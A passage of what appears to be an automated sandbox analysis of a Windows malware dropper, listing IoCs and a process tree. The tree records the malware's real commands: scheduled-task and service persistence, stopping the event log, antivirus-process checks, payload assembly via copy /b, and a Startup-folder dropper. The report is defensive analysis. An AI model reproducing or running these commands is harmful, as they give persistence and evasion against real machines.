Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4616 schtasks.exe 5560 schtasks.exe 5428 schtasks.exe 4520 schtasks.exe 2668 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1904 1719158494.319805_WWW2_64.exe 1904 1719158494.319805_WWW2_64.exe 3404 aD6EeaWc0ANl1UcIU8pjAMdj.exe 3404 aD6EeaWc0ANl1UcIU8pjAMdj.exe 3400 zEfo2aaTGtY8Jlw7voPE_fRy.exe 3400 zEfo2aaTGtY8Jlw7voPE_fRy.exe 3400 zEfo2aaTGtY8Jlw7voPE_fRy.exe 3400 zEfo2aaTGtY8Jlw7voPE_fRy.exe 2948 c2y5yHQjf6kZmhbO7LNSxYDI.exe 2948 c2y5yHQjf6kZmhbO7LNSxYDI.exe 2948 c2y5yHQjf6kZmhbO7LNSxYDI.exe 2948 c2y5yHQjf6kZmhbO7LNSxYDI.exe 2948 c2y5yHQjf6kZmhbO7LNSxYDI.exe 2948 c2y5yHQjf6kZmhbO7LNSxYDI.exe 2948 c2y5yHQjf6kZmhbO7LNSxYDI.exe 2948 c2y5yHQjf6kZmhbO7LNSxYDI.exe 2948 c2y5yHQjf6kZmhbO7LNSxYDI.exe 2948 c2y5yHQjf6kZmhbO7LNSxYDI.exe 4428 YnSvsKhbiLOUOxgxlOlruJrn.exe 4428 YnSvsKhbiLOUOxgxlOlruJrn.exe 2948 c2y5yHQjf6kZmhbO7LNSxYDI.exe 2948 c2y5yHQjf6kZmhbO7LNSxYDI.exe 2948 c2y5yHQjf6kZmhbO7LNSxYDI.exe 2948 c2y5yHQjf6kZmhbO7LNSxYDI.exe 2948 c2y5yHQjf6kZmhbO7LNSxYDI.exe 2948 c2y5yHQjf6kZmhbO7LNSxYDI.exe 2948 c2y5yHQjf6kZmhbO7LNSxYDI.exe 2948 c2y5yHQjf6kZmhbO7LNSxYDI.exe 2948 c2y5yHQjf6kZmhbO7LNSxYDI.exe 2948 c2y5yHQjf6kZmhbO7LNSxYDI.exe 2948 c2y5yHQjf6kZmhbO7LNSxYDI.exe 2948 c2y5yHQjf6kZmhbO7LNSxYDI.exe 2948 c2y5yHQjf6kZmhbO7LNSxYDI.exe 2948 c2y5yHQjf6kZmhbO7LNSxYDI.exe 2948 c2y5yHQjf6kZmhbO7LNSxYDI.exe 2948 c2y5yHQjf6kZmhbO7LNSxYDI.exe 6140 aj44C3.exe 6140 aj44C3.exe 6140 aj44C3.exe 6140 aj44C3.exe 6140 aj44C3.exe 6140 aj44C3.exe 6140 aj44C3.exe 6140 aj44C3.exe 6140 aj44C3.exe 6140 aj44C3.exe 6140 aj44C3.exe 6140 aj44C3.exe 6140 aj44C3.exe 6140 aj44C3.exe 3656 AVGBrowserUpdate.exe 3656 AVGBrowserUpdate.exe 3656 AVGBrowserUpdate.exe 3656 AVGBrowserUpdate.exe 3656 AVGBrowserUpdate.exe 3656 AVGBrowserUpdate.exe 5708 MSBuild.exe 5708 MSBuild.exe 2948 c2y5yHQjf6kZmhbO7LNSxYDI.exe 2948 c2y5yHQjf6kZmhbO7LNSxYDI.exe 2948 c2y5yHQjf6kZmhbO7LNSxYDI.exe 2948 c2y5yHQjf6kZmhbO7LNSxYDI.exe 2948 c2y5yHQjf6kZmhbO7LNSxYDI.exe 2948 c2y5yHQjf6kZmhbO7LNSxYDI.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3400 zEfo2aaTGtY8Jlw7voPE_fRy.exe Token: SeDebugPrivilege 3380 gMC6A6SQ33iFgmfhOagSNS4i.exe Token: SeDebugPrivilege 1280 EL4qA80P2nDHu0eoP3SeYX77.exe Token: SeDebugPrivilege 5036 MSBuild.exe Token: SeBackupPrivilege 5036 MSBuild.exe Token: SeSecurityPrivilege 5036 MSBuild.exe Token: SeSecurityPrivilege 5036 MSBuild.exe Token: SeSecurityPrivilege 5036 MSBuild.exe Token: SeSecurityPrivilege 5036 MSBuild.exe Token: SeDebugPrivilege 3656 AVGBrowserUpdate.exe Token: SeDebugPrivilege 3656 AVGBrowserUpdate.exe Token: SeDebugPrivilege 3656 AVGBrowserUpdate.exe Token: SeDebugPrivilege 5436 tasklist.exe Token: SeShutdownPrivilege 5692 powercfg.exe Token: SeCreatePagefilePrivilege 5692 powercfg.exe Token: SeShutdownPrivilege 432 powercfg.exe Token: SeCreatePagefilePrivilege 432 powercfg.exe Token: SeShutdownPrivilege 4464 powercfg.exe Token: SeCreatePagefilePrivilege 4464 powercfg.exe Token: SeShutdownPrivilege 3104 powercfg.exe Token: SeCreatePagefilePrivilege 3104 powercfg.exe Token: SeDebugPrivilege 5408 MSBuild.exe Token: SeDebugPrivilege 3140 powershell.exe Token: SeLockMemoryPrivilege 5512 svchost.exe Token: SeShutdownPrivilege 3104 powercfg.exe Token: SeCreatePagefilePrivilege 3104 powercfg.exe Token: SeShutdownPrivilege 5496 powercfg.exe Token: SeCreatePagefilePrivilege 5496 powercfg.exe Token: SeShutdownPrivilege 1276 powercfg.exe Token: SeCreatePagefilePrivilege 1276 powercfg.exe Token: SeShutdownPrivilege 3976 powercfg.exe Token: SeCreatePagefilePrivilege 3976 powercfg.exe Token: SeIncreaseQuotaPrivilege 1444 WMIC.exe Token: SeSecurityPrivilege 1444 WMIC.exe Token: SeTakeOwnershipPrivilege 1444 WMIC.exe Token: SeLoadDriverPrivilege 1444 WMIC.exe Token: SeSystemProfilePrivilege 1444 WMIC.exe Token: SeSystemtimePrivilege 1444 WMIC.exe Token: SeProfSingleProcessPrivilege 1444 WMIC.exe Token: SeIncBasePriorityPrivilege 1444 WMIC.exe Token: SeCreatePagefilePrivilege 1444 WMIC.exe Token: SeBackupPrivilege 1444 WMIC.exe Token: SeRestorePrivilege 1444 WMIC.exe Token: SeShutdownPrivilege 1444 WMIC.exe Token: SeDebugPrivilege 1444 WMIC.exe Token: SeSystemEnvironmentPrivilege 1444 WMIC.exe Token: SeRemoteShutdownPrivilege 1444 WMIC.exe Token: SeUndockPrivilege 1444 WMIC.exe Token: SeManageVolumePrivilege 1444 WMIC.exe Token: 33 1444 WMIC.exe Token: 34 1444 WMIC.exe Token: 35 1444 WMIC.exe Token: 36 1444 WMIC.exe Token: SeIncreaseQuotaPrivilege 1444 WMIC.exe Token: SeSecurityPrivilege 1444 WMIC.exe Token: SeTakeOwnershipPrivilege 1444 WMIC.exe Token: SeLoadDriverPrivilege 1444 WMIC.exe Token: SeSystemProfilePrivilege 1444 WMIC.exe Token: SeSystemtimePrivilege 1444 WMIC.exe Token: SeProfSingleProcessPrivilege 1444 WMIC.exe Token: SeIncBasePriorityPrivilege 1444 WMIC.exe Token: SeCreatePagefilePrivilege 1444 WMIC.exe Token: SeBackupPrivilege 1444 WMIC.exe Token: SeRestorePrivilege 1444 WMIC.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 3664 WfTgta5WPjijfB155uWBHHZw.tmp 6064 Paraguay.pif 6064 Paraguay.pif 6064 Paraguay.pif -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 6064 Paraguay.pif 6064 Paraguay.pif 6064 Paraguay.pif -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 2948 c2y5yHQjf6kZmhbO7LNSxYDI.exe 3876 setup.exe 5708 MSBuild.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1904 wrote to memory of 3380 1904 1719158494.319805_WWW2_64.exe 100 PID 1904 wrote to memory of 3380 1904 1719158494.319805_WWW2_64.exe 100 PID 1904 wrote to memory of 3380 1904 1719158494.319805_WWW2_64.exe 100 PID 1904 wrote to memory of 4020 1904 1719158494.319805_WWW2_64.exe 102 PID 1904 wrote to memory of 4020 1904 1719158494.319805_WWW2_64.exe 102 PID 1904 wrote to memory of 4020 1904 1719158494.319805_WWW2_64.exe 102 PID 1904 wrote to memory of 5072 1904 1719158494.319805_WWW2_64.exe 101 PID 1904 wrote to memory of 5072 1904 1719158494.319805_WWW2_64.exe 101 PID 1904 wrote to memory of 5072 1904 1719158494.319805_WWW2_64.exe 101 PID 1904 wrote to memory of 3400 1904 1719158494.319805_WWW2_64.exe 103 PID 1904 wrote to memory of 3400 1904 1719158494.319805_WWW2_64.exe 103 PID 1904 wrote to memory of 3400 1904 1719158494.319805_WWW2_64.exe 103 PID 1904 wrote to memory of 1280 1904 1719158494.319805_WWW2_64.exe 105 PID 1904 wrote to memory of 1280 1904 1719158494.319805_WWW2_64.exe 105 PID 1904 wrote to memory of 1280 1904 1719158494.319805_WWW2_64.exe 105 PID 1904 wrote to memory of 3404 1904 1719158494.319805_WWW2_64.exe 106 PID 1904 wrote to memory of 3404 1904 1719158494.319805_WWW2_64.exe 106 PID 1904 wrote to memory of 3404 1904 1719158494.319805_WWW2_64.exe 106 PID 1904 wrote to memory of 1792 1904 1719158494.319805_WWW2_64.exe 109 PID 1904 wrote to memory of 1792 1904 1719158494.319805_WWW2_64.exe 109 PID 1904 wrote to memory of 1792 1904 1719158494.319805_WWW2_64.exe 109 PID 1904 wrote to memory of 2656 1904 1719158494.319805_WWW2_64.exe 107 PID 1904 wrote to memory of 2656 1904 1719158494.319805_WWW2_64.exe 107 PID 1904 wrote to memory of 2656 1904 1719158494.319805_WWW2_64.exe 107 PID 1904 wrote to memory of 2948 1904 1719158494.319805_WWW2_64.exe 108 PID 1904 wrote to memory of 2948 1904 1719158494.319805_WWW2_64.exe 108 PID 1904 wrote to memory of 2948 1904 1719158494.319805_WWW2_64.exe 108 PID 1904 wrote to memory of 4428 1904 1719158494.319805_WWW2_64.exe 104 PID 1904 wrote to memory of 4428 1904 1719158494.319805_WWW2_64.exe 104 PID 1904 wrote to memory of 3024 1904 1719158494.319805_WWW2_64.exe 112 PID 1904 wrote to memory of 3024 1904 1719158494.319805_WWW2_64.exe 112 PID 1904 wrote to memory of 3024 1904 1719158494.319805_WWW2_64.exe 112 PID 1904 wrote to memory of 2388 1904 1719158494.319805_WWW2_64.exe 111 PID 1904 wrote to memory of 2388 1904 1719158494.319805_WWW2_64.exe 111 PID 1904 wrote to memory of 840 1904 1719158494.319805_WWW2_64.exe 110 PID 1904 wrote to memory of 840 1904 1719158494.319805_WWW2_64.exe 110 PID 1904 wrote to memory of 840 1904 1719158494.319805_WWW2_64.exe 110 PID 5072 wrote to memory of 3664 5072 WfTgta5WPjijfB155uWBHHZw.exe 113 PID 5072 wrote to memory of 3664 5072 WfTgta5WPjijfB155uWBHHZw.exe 113 PID 5072 wrote to memory of 3664 5072 WfTgta5WPjijfB155uWBHHZw.exe 113 PID 1792 wrote to memory of 3876 1792 2GKWWeTv71_ZgorTBROaltnj.exe 114 PID 1792 wrote to memory of 3876 1792 2GKWWeTv71_ZgorTBROaltnj.exe 114 PID 1792 wrote to memory of 3876 1792 2GKWWeTv71_ZgorTBROaltnj.exe 114 PID 3876 wrote to memory of 4380 3876 setup.exe 115 PID 3876 wrote to memory of 4380 3876 setup.exe 115 PID 3876 wrote to memory of 4380 3876 setup.exe 115 PID 3400 wrote to memory of 3548 3400 zEfo2aaTGtY8Jlw7voPE_fRy.exe 116 PID 3400 wrote to memory of 3548 3400 zEfo2aaTGtY8Jlw7voPE_fRy.exe 116 PID 3400 wrote to memory of 3548 3400 zEfo2aaTGtY8Jlw7voPE_fRy.exe 116 PID 3380 wrote to memory of 5036 3380 gMC6A6SQ33iFgmfhOagSNS4i.exe 117 PID 3380 wrote to memory of 5036 3380 gMC6A6SQ33iFgmfhOagSNS4i.exe 117 PID 3380 wrote to memory of 5036 3380 gMC6A6SQ33iFgmfhOagSNS4i.exe 117 PID 840 wrote to memory of 5284 840 aspR8VuNtToCuGKBbyNGSSvH.exe 118 PID 840 wrote to memory of 5284 840 aspR8VuNtToCuGKBbyNGSSvH.exe 118 PID 840 wrote to memory of 5284 840 aspR8VuNtToCuGKBbyNGSSvH.exe 118 PID 1280 wrote to memory of 5408 1280 EL4qA80P2nDHu0eoP3SeYX77.exe 120 PID 1280 wrote to memory of 5408 1280 EL4qA80P2nDHu0eoP3SeYX77.exe 120 PID 1280 wrote to memory of 5408 1280 EL4qA80P2nDHu0eoP3SeYX77.exe 120 PID 3380 wrote to memory of 5036 3380 gMC6A6SQ33iFgmfhOagSNS4i.exe 117 PID 3380 wrote to memory of 5036 3380 gMC6A6SQ33iFgmfhOagSNS4i.exe 117 PID 3380 wrote to memory of 5036 3380 gMC6A6SQ33iFgmfhOagSNS4i.exe 117 PID 3380 wrote to memory of 5036 3380 gMC6A6SQ33iFgmfhOagSNS4i.exe 117 PID 3380 wrote to memory of 5036 3380 gMC6A6SQ33iFgmfhOagSNS4i.exe 117 PID 3664 wrote to memory of 5328 3664 WfTgta5WPjijfB155uWBHHZw.tmp 119 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\1719158494.319805_WWW2_64.exe"C:\Users\Admin\AppData\Local\Temp\1719158494.319805_WWW2_64.exe"1⤵
- Modifies firewall policy service
- Checks computer location settings
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1904 -
C:\Users\Admin\Documents\SimpleAdobe\gMC6A6SQ33iFgmfhOagSNS4i.exeC:\Users\Admin\Documents\SimpleAdobe\gMC6A6SQ33iFgmfhOagSNS4i.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3380 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5036
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\WfTgta5WPjijfB155uWBHHZw.exeC:\Users\Admin\Documents\SimpleAdobe\WfTgta5WPjijfB155uWBHHZw.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5072 -
C:\Users\Admin\AppData\Local\Temp\is-19HNM.tmp\WfTgta5WPjijfB155uWBHHZw.tmp"C:\Users\Admin\AppData\Local\Temp\is-19HNM.tmp\WfTgta5WPjijfB155uWBHHZw.tmp" /SL5="$A01B8,5578089,54272,C:\Users\Admin\Documents\SimpleAdobe\WfTgta5WPjijfB155uWBHHZw.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3664 -
C:\Users\Admin\AppData\Local\Free Sound Recorder\freesoundrecorder32.exe"C:\Users\Admin\AppData\Local\Free Sound Recorder\freesoundrecorder32.exe" -i4⤵
- Executes dropped EXE
PID:5328
-
-
C:\Users\Admin\AppData\Local\Free Sound Recorder\freesoundrecorder32.exe"C:\Users\Admin\AppData\Local\Free Sound Recorder\freesoundrecorder32.exe" -s4⤵
- Executes dropped EXE
PID:2696
-
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\_OoFSf_wXXkzvnMktDTYroeB.exeC:\Users\Admin\Documents\SimpleAdobe\_OoFSf_wXXkzvnMktDTYroeB.exe2⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
PID:4020
-
-
C:\Users\Admin\Documents\SimpleAdobe\zEfo2aaTGtY8Jlw7voPE_fRy.exeC:\Users\Admin\Documents\SimpleAdobe\zEfo2aaTGtY8Jlw7voPE_fRy.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3400 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:3548
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:5424
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:5708
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\YnSvsKhbiLOUOxgxlOlruJrn.exeC:\Users\Admin\Documents\SimpleAdobe\YnSvsKhbiLOUOxgxlOlruJrn.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4428 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3104
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5692
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4464
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:432
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "CIFUBVHI"3⤵
- Launches sc.exe
PID:5116
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "CIFUBVHI" binpath= "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe" start= "auto"3⤵
- Launches sc.exe
PID:5468
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:5888
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "CIFUBVHI"3⤵
- Launches sc.exe
PID:4700
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\EL4qA80P2nDHu0eoP3SeYX77.exeC:\Users\Admin\Documents\SimpleAdobe\EL4qA80P2nDHu0eoP3SeYX77.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1280 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5408
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\aD6EeaWc0ANl1UcIU8pjAMdj.exeC:\Users\Admin\Documents\SimpleAdobe\aD6EeaWc0ANl1UcIU8pjAMdj.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3404 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:5560
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:4616
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\KWjblQ9QOStACiYYH0rtWTA7.exeC:\Users\Admin\Documents\SimpleAdobe\KWjblQ9QOStACiYYH0rtWTA7.exe2⤵
- Checks computer location settings
- Executes dropped EXE
PID:2656 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Confirmed Confirmed.cmd & Confirmed.cmd3⤵PID:5724
-
C:\Windows\SysWOW64\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5436
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"4⤵PID:5476
-
-
C:\Windows\SysWOW64\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
PID:5384
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"4⤵PID:628
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 7683184⤵PID:2196
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "PhoneAbcSchedulesApr" Nbc4⤵PID:4960
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b Challenged + Diy + Teachers + California + Mba + Yarn + Payable + Zdnet + Plumbing + Pe + Trick + Betting + Absence + Motorcycles + Man + Analyst + Max + Patrick + Pg + Exemption + Sight 768318\B4⤵PID:5872
-
-
C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif768318\Paraguay.pif 768318\B4⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6064 -
C:\Windows\SysWOW64\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeWise.url" & echo URL="C:\Users\Admin\AppData\Local\TradeInsight Technologies\TradeWise.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeWise.url" & exit5⤵
- Drops startup file
PID:5184
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 54⤵
- Delays execution with timeout.exe
PID:4044
-
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\c2y5yHQjf6kZmhbO7LNSxYDI.exeC:\Users\Admin\Documents\SimpleAdobe\c2y5yHQjf6kZmhbO7LNSxYDI.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks for any installed AV software in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2948 -
C:\Users\Admin\AppData\Local\Temp\aj44C3.exe"C:\Users\Admin\AppData\Local\Temp\aj44C3.exe" /relaunch=8 /was_elevated=1 /tagdata3⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks for any installed AV software in registry
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:6140 -
C:\Users\Admin\AppData\Local\Temp\nss4A30.tmp\AVGBrowserUpdateSetup.exeAVGBrowserUpdateSetup.exe /silent /install "bundlename=AVG Secure Browser&appguid={48F69C39-1356-4A7B-A899-70E3539D4982}&appname=AVG Secure Browser&needsadmin=true&lang=en-US&brand=9249&installargs=--no-create-user-shortcuts --make-chrome-default --force-default-win10 --auto-import-data%3Dmsedge --import-cookies --auto-launch-chrome"4⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4000 -
C:\Program Files (x86)\GUM5C6E.tmp\AVGBrowserUpdate.exe"C:\Program Files (x86)\GUM5C6E.tmp\AVGBrowserUpdate.exe" /silent /install "bundlename=AVG Secure Browser&appguid={48F69C39-1356-4A7B-A899-70E3539D4982}&appname=AVG Secure Browser&needsadmin=true&lang=en-US&brand=9249&installargs=--no-create-user-shortcuts --make-chrome-default --force-default-win10 --auto-import-data%3Dmsedge --import-cookies --auto-launch-chrome"5⤵
- Event Triggered Execution: Image File Execution Options Injection
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3656 -
C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe"C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe" /regsvc6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:2640
-
-
C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe"C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe" /regserver6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:2440 -
C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserUpdateComRegisterShell64.exe"C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserUpdateComRegisterShell64.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:3096
-
-
C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserUpdateComRegisterShell64.exe"C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserUpdateComRegisterShell64.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:1992
-
-
C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserUpdateComRegisterShell64.exe"C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserUpdateComRegisterShell64.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:3152
-
-
-
C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe"C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgb21haGFpZD0iezFDODlFRjJGLUE4OEUtNERFMC05N0ZFLUNCNDBDOEU0RkVFQX0iIHVwZGF0ZXJ2ZXJzaW9uPSIxLjguMTY5My42IiBzaGVsbF92ZXJzaW9uPSIxLjguMTY5My42IiBpc21hY2hpbmU9IjEiIGlzX29tYWhhNjRiaXQ9IjAiIGlzX29zNjRiaXQ9IjEiIHNlc3Npb25pZD0ie0M4QTI4NjY1LURDN0MtNDlBQy1BMUNBLTg2ODgyMkFCMjQ0OH0iIGNlcnRfZXhwX2RhdGU9IjIwMjUwOTE3IiB1c2VyaWQ9Ins3OEY1RkE4RC04NjJCLTRFM0QtQTdGMi05RUMyMjg1MzZDQkR9IiB1c2VyaWRfZGF0ZT0iMjAyNDA2MjMiIG1hY2hpbmVpZD0iezAwMDA5QkIwLTk4NjYtMzU5Mi1BM0E2LTA4NkJDQzI5MDlFN30iIG1hY2hpbmVpZF9kYXRlPSIyMDI0MDYyMyIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiB0ZXN0c291cmNlPSJhdXRvIiByZXF1ZXN0aWQ9IntFRUE5QTJGMS0yQTdBLTQ5RkQtQjJGNy04ODQ2NzJGODU4RDd9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IHBoeXNtZW1vcnk9IjgiIHNzZT0iMSIgc3NlMj0iMSIgc3NlMz0iMSIgc3NzZTM9IjEiIHNzZTQxPSIxIiBzc2U0Mj0iMSIgYXZ4PSIxIi8-PG9zIHBsYXRmb3JtPSJ3aW4iIHZlcnNpb249IjEwLjAuMTkwNDEuMTI4OCIgc3A9IiIgYXJjaD0ieDY0Ii8-PGFwcCBhcHBpZD0iezFDODlFRjJGLUE4OEUtNERFMC05N0ZFLUNCNDBDOEU0RkVFQX0iIHZlcnNpb249IiIgbmV4dHZlcnNpb249IjEuOC4xNjkzLjYiIGxhbmc9ImVuLVVTIiBicmFuZD0iOTI0OSIgY2xpZW50PSIiPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIGluc3RhbGxfdGltZV9tcz0iMTAwMCIvPjwvYXBwPjwvcmVxdWVzdD46⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5244
-
-
C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe"C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe" /handoff "bundlename=AVG Secure Browser&appguid={48F69C39-1356-4A7B-A899-70E3539D4982}&appname=AVG Secure Browser&needsadmin=true&lang=en-US&brand=9249&installargs=--no-create-user-shortcuts --make-chrome-default --force-default-win10 --auto-import-data%3Dmsedge --import-cookies --auto-launch-chrome" /installsource otherinstallcmd /sessionid "{C8A28665-DC7C-49AC-A1CA-868822AB2448}" /silent6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3700
-
-
-
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\2GKWWeTv71_ZgorTBROaltnj.exeC:\Users\Admin\Documents\SimpleAdobe\2GKWWeTv71_ZgorTBROaltnj.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1792 -
